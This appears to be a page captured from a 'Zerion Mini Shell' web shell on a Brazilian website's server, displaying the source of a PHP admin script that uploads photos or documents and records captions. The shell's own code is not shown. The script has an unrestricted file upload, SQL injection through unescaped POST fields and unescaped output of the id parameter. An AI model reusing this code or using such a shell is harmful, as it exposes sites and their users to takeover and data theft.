Mini Shell

Direktori : /home/sicomercio/public_html/adm/
Upload File :
Current File : /home/sicomercio/public_html/adm/anexaarquivofoto.php

<script src="https://code.jquery.com/jquery-latest.js"></script>
<script src="https://www.riobrasil.net/boot/assets/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">

<?
session_start();
$idUsuario =  $_SESSION['idUsuario'];
$permissao =  $_SESSION['permissao'];
 



if(empty($idUsuario))
 {
	
 
exit();
}
 else
 {
 }
 
 
 
 

$id = $_GET["id"]; 
 

echo"</br>
<center>
<form method=\"POST\" enctype=\"multipart/form-data\" action=\"anexaarquivofoto.php\">

  
     <input class=\"form-control\" type=\"hidden\" value= \"$id\" name=\"id\"    style=\"width:100px;\">
 
<input type=\"file\" accept=\".jpg, .jpeg, .pdf, .doc, .docx, .xls, .xlsx\" required class=\"form-control btn btn-primary\" name=\"pic\">    
</BR>

<input type=\"text\"  class=\"form-control\" placeholder = 'LEGENDA' name=\"legenda\">    

</br>
<input type='submit' name='btn1'  id='btn1' class = 'btn btn-success bot-click'  value='ENVIAR' style='width:180px; '\">
</form>
</center>
";

 



 if($_POST){

switch ($permissao)
{
case "2":
//print_r($_POST);
$id = $_POST["id"]; 
 
$pic = $_POST["pic"]; 
$legenda = $_POST["legenda"]; 

 
 	// envia arquivo  
	  
	  if(isset($_FILES['pic']))
 {
    $ext = strtolower(substr($_FILES['pic']['name'],-4)); //Pegando extensão do arquivo
	 
	 
	 
	 
	 
 if(empty($ext))
 {
 $new_name = "fotos/semfoto.jpg"; //Definindo um novo nome para o arquivo
 }
 else
 {
    $new_name = date("YmdHis") . $ext; //Definindo um novo nome para o arquivo
 }
 
 
 
	
	
	
$dir = "fotos/dados/"; //Diretório para uploads
  
    move_uploaded_file($_FILES['pic']['tmp_name'], $dir.$new_name); //Fazer upload do arquivo
   
 }
	  
	 
	  // final do envia arquivo 

 
 	 


include"conexao.php";


  //print_r($_POST);


 $sql = "INSERT INTO fotos (arquivo,local,legenda) VALUES ('$new_name','$id','$legenda')";
  // echo"$sql";
if ($con->query($sql) === TRUE) {
   
} else {
    echo "Error: " . $sql . "<br>" . $con->error;
}
 
$con->close();
 

 
 
     $id= base64_decode($id);
	   $id = utf8_encode($id);

// echo"$id $id ";

 
   echo"<script type='text/javascript'> 
   alert('SUCESSO! ');
 window.open('dados.php?id=$id','_parent');
   </script>";
 


/*
print'<script type="text/javascript">
   alert("SUCESSO!");
parent.$.fancybox.close();
         parent.location.reload(true); 
</script>';
*/


break;

default:
echo "<script>
alert('sem permissão! ');
 
</script>";
exit();
break;
}

 }

?>

Zerion Mini Shell 1.0